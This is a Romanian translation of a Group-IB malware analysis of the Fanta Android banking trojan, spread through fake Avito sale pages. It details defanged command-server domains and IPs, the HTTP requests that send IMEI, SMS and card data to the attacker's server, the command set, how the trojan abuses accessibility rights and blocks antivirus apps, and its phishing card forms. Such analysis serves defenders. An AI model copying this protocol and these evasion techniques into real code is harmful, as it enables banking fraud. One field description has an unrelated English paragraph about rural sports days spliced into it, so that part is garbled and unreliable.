ProHoster > BLOG > știri pe internet > Leysya, Fanta: o nouă tactică pentru un vechi troian Android

Leysya, Fanta: o nouă tactică pentru un vechi troian Android

Leysya, Fanta: o nouă tactică pentru un vechi troian Android

Într-o zi vrei să vinzi ceva pe Avito și, după ce ai postat o descriere detaliată a produsului tău (de exemplu, un modul RAM), vei primi acest mesaj:

Leysya, Fanta: o nouă tactică pentru un vechi troian AndroidOdată ce deschideți linkul, veți vedea o pagină aparent inofensivă care vă anunță pe dvs., vânzătorul fericit și de succes, că a fost făcută o achiziție:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
După ce faceți clic pe butonul „Continuați”, un fișier APK cu o pictogramă și un nume care inspiră încredere va fi descărcat pe dispozitivul dvs. Android. Ai instalat o aplicație care din anumite motive a cerut drepturi AccessibilityService, apoi au apărut câteva ferestre și au dispărut rapid și... Gata.

Mergeți să vă verificați soldul, dar din anumite motive aplicația dvs. bancară vă solicită din nou detaliile cardului. După introducerea datelor, se întâmplă ceva groaznic: dintr-un motiv neclar pentru tine, banii încep să dispară din contul tău. Încercați să rezolvați problema, dar telefonul dumneavoastră rezistă: apăsă tastele „Înapoi” și „Acasă”, nu se oprește și nu vă permite să activați nicio măsură de securitate. Ca urmare, rămâi fără bani, bunurile tale nu au fost cumpărate, ești confuz și te întrebi: ce s-a întâmplat?

Răspunsul este simplu: ați devenit o victimă a troianului Android Fanta, membru al familiei Flexnet. Cum sa întâmplat asta? Să explicăm acum.

Autori: Andrei Polovinkin, specialist junior în analiza malware, Ivan Pisarev, specialist in analiza malware.

Unele statistici

Familia Flexnet de troieni Android a devenit cunoscută pentru prima dată în 2015. Pe o perioadă destul de lungă de activitate, familia sa extins la mai multe subspecii: Fanta, Limebot, Lipton etc. Troianul, precum și infrastructura asociată acestuia, nu stau pe loc: se dezvoltă noi scheme eficiente de distribuție - în cazul nostru, pagini de phishing de înaltă calitate care vizează un anumit utilizator-vânzător, iar dezvoltatorii troieni urmăresc tendințele la modă în scrierea virușilor - adăugarea de noi funcționalități care fac posibilă furtul mai eficient de bani de pe dispozitivele infectate și ocolirea mecanismelor de protecție.

Campania descrisă în acest articol se adresează utilizatorilor din Rusia; un număr mic de dispozitive infectate au fost înregistrate în Ucraina și chiar mai puține în Kazahstan și Belarus.

Chiar dacă Flexnet se află în arena troienilor Android de peste 4 ani și a fost studiat în detaliu de mulți cercetători, este încă într-o formă bună. Începând din ianuarie 2019, valoarea potențială a pagubelor este de peste 35 de milioane de ruble - și aceasta este doar pentru campaniile din Rusia. În 2015, diferite versiuni ale acestui troian Android au fost vândute pe forumuri subterane, unde a putut fi găsit și codul sursă al troianului cu o descriere detaliată. Aceasta înseamnă că statisticile daunelor din lume sunt și mai impresionante. Nu este un indicator rău pentru un astfel de bătrân, nu-i așa?

Leysya, Fanta: o nouă tactică pentru un vechi troian Android

De la vânzare la înșelăciune

După cum se poate vedea din captura de ecran prezentată anterior a unei pagini de phishing pentru serviciul de Internet pentru postarea de anunțuri Avito, aceasta a fost pregătită pentru o anumită victimă. Aparent, atacatorii folosesc unul dintre analizatorii lui Avito, care extrage numărul de telefon și numele vânzătorului, precum și descrierea produsului. După extinderea paginii și pregătirea fișierului APK, victimei i se trimite un SMS cu numele său și un link către o pagină de phishing care conține o descriere a produsului său și suma primită din „vânzarea” produsului. Făcând clic pe buton, utilizatorul primește un fișier APK rău intenționat - Fanta.

Un studiu al domeniului shcet491[.]ru a arătat că acesta este delegat serverelor DNS ale Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Fișierul zonei de domeniu conține intrări care indică adresele IP 31.220.23[.]236, 31.220.23[.]243 și 31.220.23[.]235. Cu toate acestea, înregistrarea resurselor primare a domeniului (înregistrarea A) indică către un server cu adresa IP 178.132.1[.]240.

Adresa IP 178.132.1[.]240 este situată în Țările de Jos și aparține hosterului WorldStream. Adresele IP 31.220.23[.]235, 31.220.23[.]236 și 31.220.23[.]243 sunt situate în Marea Britanie și aparțin serverului de găzduire partajată HOSTINGER. Folosit ca reportofon openprov-ru. Următoarele domenii au fost, de asemenea, rezolvate la adresa IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Trebuie remarcat faptul că linkurile în următorul format erau disponibile din aproape toate domeniile:

http://(www.){0,1}<%domain%>/[0-9]{7}

Acest șablon include și un link dintr-un mesaj SMS. Pe baza datelor istorice, s-a constatat că un domeniu corespunde mai multor legături în modelul descris mai sus, ceea ce indică faptul că un domeniu a fost folosit pentru a distribui troianul mai multor victime.

Să trecem puțin înainte: troianul descărcat printr-un link dintr-un SMS folosește adresa onusedseddohap[.]club. Acest domeniu a fost înregistrat pe 2019-03-12, iar începând cu 2019-04-29, aplicațiile APK au interacționat cu acest domeniu. Pe baza datelor obținute de la VirusTotal, un total de 109 aplicații au interacționat cu acest server. Domeniul în sine a fost rezolvat la adresa IP 217.23.14[.]27, situat în Țările de Jos și deținut de hoster WorldStream. Folosit ca reportofon NameCheap. Domeniile s-au rezolvat și la această adresă IP bad-racoon[.]club (începând din 2018-09-25) și bad-racoon[.]live (începând din 2018-10-25). Cu domeniu bad-racoon[.]club peste 80 de fișiere APK au interacționat bad-racoon[.]live - peste 100.

În general, atacul evoluează după cum urmează:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android

Ce se află sub capacul lui Fanta?

La fel ca mulți alți troieni Android, Fanta este capabil să citească și să trimită mesaje SMS, să facă cereri USSD și să afișeze propriile ferestre deasupra aplicațiilor (inclusiv cele bancare). Cu toate acestea, arsenalul de funcționalitate al acestei familii a sosit: Fanta a început să folosească Serviciul de accesibilitate în diverse scopuri: citirea conținutului notificărilor din alte aplicații, prevenirea detectării și oprirea execuției unui troian pe un dispozitiv infectat etc. Fanta funcționează pe toate versiunile de Android nu mai mici de 4.4. În acest articol vom arunca o privire mai atentă asupra următoarei mostre Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Imediat după lansare

Imediat după lansare, troianul își ascunde pictograma. Aplicația poate funcționa numai dacă numele dispozitivului infectat nu este în listă:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (brici)

Această verificare este efectuată în serviciul principal al troianului - Serviciul principal. Când sunt lansate pentru prima dată, parametrii de configurare ai aplicației sunt inițializați la valorile implicite (formatul pentru stocarea datelor de configurare și semnificația acestora vor fi discutate mai târziu), iar un nou dispozitiv infectat este înregistrat pe serverul de control. O solicitare HTTP POST cu tipul de mesaj va fi trimisă către server register_bot și informații despre dispozitivul infectat (versiunea Android, IMEI, număr de telefon, numele operatorului și codul țării în care este înregistrat operatorul). Adresa servește drept server de control hXXp://onuseseddohap[.]club/controller.php. Ca răspuns, serverul trimite un mesaj care conține câmpurile bot_id, bot_pwd, serverul — aplicația salvează aceste valori ca parametri ai serverului CnC. Parametru serverul opțional dacă câmpul nu a fost primit: Fanta folosește adresa de înregistrare - hXXp://onuseseddohap[.]club/controller.php. Funcția de schimbare a adresei CnC poate fi folosită pentru a rezolva două probleme: pentru a distribui în mod egal încărcarea între mai multe servere (dacă există un număr mare de dispozitive infectate, încărcarea pe un server web neoptimizat poate fi mare) și, de asemenea, pentru a utiliza un server alternativ în cazul unei defecțiuni a unuia dintre serverele CnC .

Dacă apare o eroare la trimiterea cererii, troianul va repeta procesul de înregistrare după 20 de secunde.

Odată ce dispozitivul a fost înregistrat cu succes, Fanta va afișa următorul mesaj utilizatorului:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
Notă importantă: serviciul a sunat Securitatea sistemului — numele serviciului troian, iar după apăsarea butonului ОК Se va deschide o fereastră cu setările de accesibilitate ale dispozitivului infectat, unde utilizatorul trebuie să acorde drepturi de accesibilitate pentru serviciul rău intenționat:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
De îndată ce utilizatorul pornește Serviciul de accesibilitate, Fanta obține acces la conținutul ferestrelor aplicației și la acțiunile efectuate în acestea:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
Imediat după primirea drepturilor de accesibilitate, troianul solicită drepturi de administrator și drepturi de citire a notificărilor:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
Folosind AccessibilityService, aplicația simulează apăsările de taste, oferindu-și astfel toate drepturile necesare.

Fanta creează mai multe instanțe de baze de date (care vor fi descrise mai târziu) necesare pentru a stoca datele de configurare, precum și informațiile colectate în proces despre dispozitivul infectat. Pentru a trimite informațiile colectate, troianul creează o sarcină repetată menită să descarce câmpuri din baza de date și să primească o comandă de la serverul de control. Intervalul de accesare a CnC este setat în funcție de versiunea Android: în cazul 5.1, intervalul va fi de 10 secunde, în caz contrar 60 de secunde.

Pentru a primi comanda, Fanta face o cerere GetTask la serverul de management. Ca răspuns, CnC poate trimite una dintre următoarele comenzi:

Echipă descriere
0 Trimite mesaj SMS
1 Efectuați un apel telefonic sau o comandă USSD
2 Actualizează un parametru interval
3 Actualizează un parametru intercepta
6 Actualizează un parametru smsManager
9 Începeți să colectați mesaje SMS
11 Resetați telefonul la setările din fabrică
12 Activați/dezactivați înregistrarea în jurnal pentru crearea casetei de dialog

Fanta colectează, de asemenea, notificări de la 70 de aplicații bancare, sisteme de plată rapidă și portofele electronice și le stochează într-o bază de date.

Stocarea parametrilor de configurare

Pentru a stoca parametrii de configurare, Fanta folosește o abordare standard pentru platforma Android - Preferințe-fisare. Setările vor fi salvate într-un fișier numit setări. O descriere a parametrilor salvați este în tabelul de mai jos.

Nume Valoare implicită Valori posibile descriere
id 0 Întreg ID-ul botului
serverul hXXp://onuseseddohap[.]club/ URL-ul Adresa serverului de control
PWD - Şir Parola serverului
interval 20 Întreg Interval de timp. Indică cât timp trebuie amânate următoarele sarcini:

  • Când trimiteți o solicitare despre starea unui mesaj SMS trimis
  • Primirea unei noi comenzi de la serverul de management
intercepta toate all/telNumber Dacă câmpul este egal cu șirul toate sau telNumber, atunci mesajul SMS primit va fi interceptat de aplicație și nu va fi afișat utilizatorului
smsManager 0 0/1 Activați/dezactivați aplicația ca destinatar SMS implicit
readDialog fals Adevarat fals Activați/Dezactivați înregistrarea evenimentelor Eveniment de accesibilitate

Fanta folosește și fișierul smsManager:

Nume Valoare implicită Valori posibile descriere
pckg - Şir Numele managerului de mesaje SMS utilizat

Interacțiunea cu bazele de date

În timpul funcționării sale, troianul folosește două baze de date. Baza de date numită a folosit pentru a stoca diverse informații colectate de pe telefon. A doua bază de date este numită fanta.db și este folosit pentru a salva setările responsabile cu crearea ferestrelor de phishing concepute pentru a colecta informații despre cardurile bancare.

Troianul folosește baza de date а pentru a stoca informațiile colectate și a vă înregistra acțiunile. Datele sunt stocate într-un tabel busteni. Pentru a crea un tabel, utilizați următoarea interogare SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Baza de date conține următoarele informații:

1. Înregistrarea pornirii dispozitivului infectat cu un mesaj S-a pornit telefonul!

2. Notificări de la aplicații. Mesajul este generat conform următorului șablon:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Datele cardurilor bancare din formularele de phishing create de troian. Parametru VIEW_NAME poate fi una dintre următoarele:

  • AliExpress
  • Avito
  • Google Play,
  • Diverse

Mesajul este înregistrat în formatul:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Mesaje SMS de intrare/ieșire în formatul:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informații despre pachetul care creează caseta de dialog în formatul:

(<%Package name%>)<%Package information%>

Exemplu de tabel busteni:

Leysya, Fanta: o nouă tactică pentru un vechi troian Android
Una dintre funcționalitățile Fanta este colectarea de informații despre cardurile bancare. Colectarea datelor are loc prin crearea ferestrelor de phishing la deschiderea aplicațiilor bancare. Troianul creează fereastra de phishing o singură dată. Informațiile că fereastra a fost afișată utilizatorului sunt stocate într-un tabel setări în baza de date fanta.db. Pentru a crea o bază de date, utilizați următoarea interogare SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Toate câmpurile tabelului setări inițializat implicit la 1 (creați o fereastră de phishing). După ce utilizatorul introduce datele, valoarea va fi setată la 0. Exemplu de câmpuri de tabel setări:

  • pot_login — câmpul este responsabil pentru afișarea formularului la deschiderea unei aplicații bancare
  • prima_bancă - nefolosit
  • can_avito — câmpul este responsabil pentru afișarea formularului la deschiderea aplicației Avito
  • can_ali — câmpul este responsabil pentru afișarea formularului la deschiderea aplicației Aliexpress
  • poate_altul — câmpul este responsabil pentru afișarea formularului la deschiderea oricărei aplicații din listă: Yula, Pandao, Drom Auto, Portofel. Carduri de reducere și bonus, Aviasales, Booking, Trivago
  • poate_card — câmpul este responsabil pentru afișarea formularului la deschidere Google Play,

Interacțiunea cu serverul de management

Interacțiunea rețelei cu serverul de management are loc prin protocolul HTTP. Pentru a lucra cu rețeaua, Fanta folosește populara bibliotecă Retrofit. Cererile se trimit la: hXXp://onuseseddohap[.]club/controller.php. Adresa serverului poate fi schimbată la înregistrarea pe server. Cookie-urile pot fi trimise ca răspuns de la server. Fanta face următoarele solicitări către server:

  • Înregistrarea botului pe serverul de control are loc o singură dată, la prima lansare. Următoarele date despre dispozitivul infectat sunt trimise către server:
    · Cookie — cookie-uri primite de la server (valoarea implicită este un șir gol)
    · mod — constantă de șir register_bot
    · prefix — constantă întreagă 2
    · version_sdk — se formează după următorul model: /(Avit)
    · IMEI — IMEI al dispozitivului infectat
    · ţară — codul țării în care este înregistrat operatorul, în format ISO
    · număr - număr de telefon
    · operator - numele operatorului

    Un exemplu de solicitare trimisă la server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Ca răspuns la cerere, serverul trebuie să returneze un obiect JSON care conține următorii parametri:
    · bot_id — ID-ul dispozitivului infectat. Dacă bot_id este egal cu 0, Fanta va executa din nou cererea.
    bot_pwd — parola pentru server.
    Server — adresa serverului de control. Parametru opțional. Dacă parametrul nu este specificat, se va folosi adresa salvată în aplicație.

    Exemplu de obiect JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Solicitați primirea unei comenzi de la server. Următoarele date sunt trimise către server:
    · Cookie — cookie-uri primite de la server
    · ofertă — ID-ul dispozitivului infectat care a fost primit la trimiterea cererii register_bot
    · PWD -parola pentru server
    · divice_admin — câmpul determină dacă au fost obținute drepturi de administrator. Dacă au fost obținute drepturi de administrator, câmpul este egal cu 1, in caz contrar 0
    · Accesibilitate — Starea de funcționare a serviciului de accesibilitate. Dacă serviciul a fost pornit, valoarea este 1, in caz contrar 0
    · SMSManager — arată dacă troianul este activat ca aplicație implicită pentru primirea SMS-urilor
    · ecran — afișează în ce stare se află ecranul. Valoarea va fi setată 1, dacă ecranul este pornit, în caz contrar 0;

    Un exemplu de solicitare trimisă la server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    În funcție de comandă, serverul poate returna un obiect JSON cu diferiți parametri:

    · Echipă Trimite mesaj SMS: Parametrii conțin numărul de telefon, textul mesajului SMS și ID-ul mesajului trimis. Identificatorul este folosit la trimiterea unui mesaj către server cu tip setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Echipă Efectuați un apel telefonic sau o comandă USSD: Numărul de telefon sau comanda vine în corpul răspunsului. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Echipă Modificați parametrul de interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Echipă Modificați parametrul de interceptare. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Echipă Schimbați câmpul SMSManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Echipă Colectați mesaje SMS de pe un dispozitiv infectat.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Echipă Resetați telefonul la setările din fabrică: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Echipă Modificați parametrul ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Trimiterea unui mesaj cu tip setSmsStatus. Această solicitare se face după executarea comenzii Trimite mesaj SMS. Cererea arată astfel:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Încărcarea conținutului bazei de date. Se transmite un rând pentru fiecare cerere. Următoarele date sunt trimise către server:
    · Cookie — cookie-uri primite de la server
    · mod — constantă de șir setSaveInboxSms
    · ofertă — ID-ul dispozitivului infectat care a fost primit la trimiterea cererii register_bot
    · a) Sport and Nutrition Awareness Day in Manasia Around XNUMX people from the rural commune Manasia have participated in a sports and healthy nutrition oriented activity in one of the community’s sports ready yards. This activity was meant to gather, mainly, middle-aged people from a Romanian rural community and teach them about the benefits that sports have on both their mental and physical health and on how sporting activities can be used to bring people from a community closer together. Three trainers were made available for this event, so that the participants would get the best possible experience physically and so that they could have the best access possible to correct information and good sports/nutrition practices. b) Sports Awareness Day in Poiana Țapului A group of young participants have taken part in sporting activities meant to teach them about sporting conduct, fairplay, and safe physical activities. The day culminated with a football match. — text din înregistrarea curentă a bazei de date (câmp d de la masă busteni în baza de date а)
    · număr — numele înregistrării curente a bazei de date (câmp p de la masă busteni în baza de date а)
    · sms_mode — valoare întreagă (câmp m de la masă busteni în baza de date а)

    Cererea arată astfel:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Dacă este trimis cu succes la server, rândul va fi șters din tabel. Exemplu de obiect JSON returnat de server:

    {
    "response":[],
    "status":"ok"
}

Interacționează cu AccessibilityService

AccesibilityService a fost implementat pentru a face dispozitivele Android mai ușor de utilizat pentru persoanele cu dizabilități. În cele mai multe cazuri, interacțiunea fizică este necesară pentru a interacționa cu o aplicație. AccessibilityService vă permite să le faceți în mod programatic. Fanta folosește serviciul pentru a crea ferestre false în aplicațiile bancare și pentru a împiedica utilizatorii să deschidă setările sistemului și unele aplicații.

Folosind funcționalitatea AccessibilityService, troianul monitorizează modificările elementelor de pe ecranul dispozitivului infectat. După cum s-a descris anterior, setările Fanta conțin un parametru responsabil pentru operațiunile de înregistrare cu casete de dialog - readDialog. Dacă acest parametru este setat, informațiile despre numele și descrierea pachetului care a declanșat evenimentul vor fi adăugate în baza de date. Troianul efectuează următoarele acțiuni atunci când sunt declanșate evenimente:

  • Simulează apăsarea tastelor înapoi și acasă în următoarele cazuri:
    · dacă utilizatorul dorește să-și repornească dispozitivul
    · dacă utilizatorul dorește să șterge aplicația „Avito” sau să modifice drepturile de acces
    · dacă apare mențiunea aplicației „Avito” pe pagină
    · când deschideți aplicația Google Play Protect
    · atunci când deschideți pagini cu setări AccessibilityService
    · când apare caseta de dialog System Security
    · când deschideți pagina cu setările „Desenați peste altă aplicație”.
    · la deschiderea paginii „Aplicații”, „Recuperare și resetare”, „Resetare date”, „Resetare setări”, „Panoul dezvoltatorului”, „Special. oportunități”, „Oportunități speciale”, „Drepturi speciale”
    · dacă evenimentul a fost generat de anumite aplicații.

    Lista aplicațiilor

    • Android
    • Master Lite
    • Maestrul curateniei
    • Clean Master pentru procesorul x86
    • Gestionarea permisiunilor aplicației Meizu
    • Securitate MIUI
    • Clean Master - Antivirus & Cache și Garbage Cleaner
    • Control parental și GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus și protecție gratuită 2019
    • Securitate mobilă MegaFon
    • Protecție AVG pentru Xperia
    • Securitate mobilă
    • Antivirus și protecție Malwarebytes
    • Antivirus pentru Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG pentru tableta Huawei System Manager
    • Samsung Accesibilitate
    • Samsung Smart Manager
    • Maestrul de securitate
    • Accelerator
    • dr.web
    • Dr. Web Security Space
    • Centrul de control mobil Dr.Web
    • Dr.Web Security Space Life
    • Centrul de control mobil Dr.Web
    • Antivirus și securitate mobilă
    • Kaspersky Internet Security: Antivirus și protecție
    • Durată de viață a bateriei Kaspersky: economisire și amplificare
    • Kaspersky Endpoint Security - protecție și management
    • AVG Antivirus free 2019 – Protecție pentru Android
    • Antivirus Android
    • Norton Mobile Security și Antivirus
    • Antivirus, firewall, VPN, securitate mobilă
    • Securitate mobilă: antivirus, VPN, protecție împotriva furtului
    • Antivirus pentru Android

  • Dacă se solicită permisiunea la trimiterea unui mesaj SMS la un număr scurt, Fanta simulează clic pe caseta de selectare Amintiți-vă alegerea și butonul pentru a trimite.
  • Când încercați să luați drepturi de administrator de la troian, acesta blochează ecranul telefonului.
  • Împiedică adăugarea de noi administratori.
  • Dacă aplicația antivirus dr.web a detectat o amenințare, Fanta imită apăsarea butonului ignora.
  • Troianul simulează apăsarea butonului înapoi și acasă dacă evenimentul a fost generat de aplicație Îngrijirea dispozitivului Samsung.
  • Fanta creează ferestre de phishing cu formulare pentru introducerea informațiilor despre cardurile bancare dacă a fost lansată o aplicație dintr-o listă de aproximativ 30 de servicii Internet diferite. Printre acestea: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto etc.

    Formulare de phishing

    Fanta analizează ce aplicații rulează pe dispozitivul infectat. Dacă a fost deschisă o aplicație de interes, troianul afișează o fereastră de phishing deasupra tuturor celorlalte, care este un formular pentru introducerea informațiilor despre cardul bancar. Utilizatorul trebuie să introducă următoarele date:

    • Numărul de card
    • Data de expirare a cardului
    • CVV
    • Numele titularului cardului (nu pentru toate băncile)

    În funcție de aplicația care rulează, vor fi afișate diferite ferestre de phishing. Mai jos sunt exemple ale unora dintre ele:

    AliExpress:

    Leysya, Fanta: o nouă tactică pentru un vechi troian Android
    Avito:

    Leysya, Fanta: o nouă tactică pentru un vechi troian Android
    Pentru alte aplicații, de ex. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: o nouă tactică pentru un vechi troian Android

    Cum a fost cu adevărat

    Din fericire, persoana care a primit mesajul SMS descris la începutul articolului s-a dovedit a fi un specialist în securitate cibernetică. Prin urmare, versiunea reală, non-director, diferă de cea spusă mai devreme: o persoană a primit un SMS interesant, după care l-a dat echipei Group-IB Threat Hunting Intelligence. Rezultatul atacului este acest articol. Sfârșit fericit, nu? Cu toate acestea, nu toate poveștile se termină cu atâta succes și pentru ca a ta să nu arate ca o tăietură de regizor cu o pierdere de bani, în majoritatea cazurilor este suficient să respectați următoarele reguli descrise îndelung:

    • nu instalați aplicații pentru un dispozitiv mobil cu sistem de operare Android din alte surse decât Google Play
    • Când instalați o aplicație, acordați o atenție deosebită drepturilor solicitate de aplicație
    • acordați atenție extensiilor fișierelor descărcate
    • instalați în mod regulat actualizări ale sistemului de operare Android
    • nu vizitați resurse suspecte și nu descărcați fișiere de acolo
    • Nu faceți clic pe linkurile primite în mesajele SMS.

Sursa: www.habr.com

Adauga un comentariu